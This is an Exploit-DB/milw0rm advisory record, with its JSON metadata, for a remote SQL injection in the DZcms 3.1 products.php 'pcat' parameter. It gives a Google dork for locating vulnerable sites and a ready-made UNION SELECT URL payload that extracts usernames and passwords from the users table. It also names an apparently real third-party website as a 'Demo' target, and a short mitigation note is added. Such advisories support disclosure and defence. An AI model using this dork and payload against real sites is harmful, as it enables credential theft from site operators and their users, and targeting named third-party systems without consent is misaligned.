ID EDB-ID:7722
Type exploitdb
Reporter Glafkos Charalambous
Modified 2009-01-11T00:00:00
Description
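DZcms v.3.1 (products.php, `pcat` parameter) remote SQL injection vulnerability. Webapps exploit for the PHP platform. Judging from the PoC below, the `pcat` query-string value reaches a SQL statement without escaping or parameter binding, so an appended UNION SELECT can return rows from other tables (here the `username` and `password` columns of `users`).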
Application: DZcms v.3.1
Vendor Name: CyDezines
Vendor Url: http://www.cydezines.com
Bug Type: dzCMS SQL Injection Vulnerability
Exploitation: Remote
Severity: High
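Solution Status: Unpatched (as of the advisory date, 2009-01-11; this page references no vendor fix). Until a fix is available, operators can bind `pcat` as a query parameter or reject non-numeric values (it appears to be a numeric category id; confirm against the application), review web access logs for `products.php` requests whose `pcat` value contains a quote or `union`/`select`, and treat the credentials stored in the `users` table as exposed if such requests are found.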
Google Dork: "Powered by DZcms"
POC: http://www.demo.com/products.php?pcat=1'+union+select+all+convert(group_concat(username,0x3a,password)%20using%20latin1),2,3,4,5+from+users/*
Demo:
http://www.psgdynamicsystems.com/products.php?pcat=1'+union+select+all+convert(group_concat(username,0x3a,password)%20using%20latin1),2,3,4,5+from+users/*
Credits: Glafkos Charalambous
glafkos [at] astalavista [dot] com
# milw0rm.com [2009-01-11]
{"id": "EDB-ID:7722", "type": "exploitdb", "bulletinFamily": "exploit", "title": "DZcms 3.1 products.php pcat Remote SQL Injection Vulnerability", "description": "DZcms v.3.1 (products.php pcat) Remote SQL Injection Vulnerability. Webapps exploit for php platform", "published": "2009-01-11T00:00:00", "modified": "2009-01-11T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.exploit-db.com/exploits/7722/", "reporter": "Glafkos Charalambous ", "references": [], "cvelist": [], "lastseen": "2016-02-01T03:53:32", "viewCount": 8, "enchantments": {"score": {"value": 0.2, "vector": "NONE", "modified": "2016-02-01T03:53:32", "rev": 2}, "dependencies": {"references": [], "modified": "2016-02-01T03:53:32", "rev": 2}, "vulnersScore": 0.2}, "sourceHref": "https://www.exploit-db.com/download/7722/", "sourceData": "Application: DZcms v.3.1\r\nVendor Name: CyDezines\r\nVendor Url: http://www.cydezines.com\r\nBug Type: dzCMS SQL Injection Vulnerability\r\nExploitation: Remote\r\nSeverity: High\r\nSolution Status: Unpatched\r\nGoogle Dork: \"Powered by DZcms\"\r\n\r\nPOC: http://www.demo.com/products.php?pcat=1'+union+select+all+convert(group_concat(username,0x3a,password)%20using%20latin1),2,3,4,5+from+users/*\r\n\r\nDemo:\r\nhttp://www.psgdynamicsystems.com/products.php?pcat=1'+union+select+all+convert(group_concat(username,0x3a,password)%20using%20latin1),2,3,4,5+from+users/*\r\n\r\nCredits: Glafkos Charalambous\r\nglafkos [at] astalavista [dot] com\r\n\r\n# milw0rm.com [2009-01-11]\r\n", "osvdbidlist": []}
{}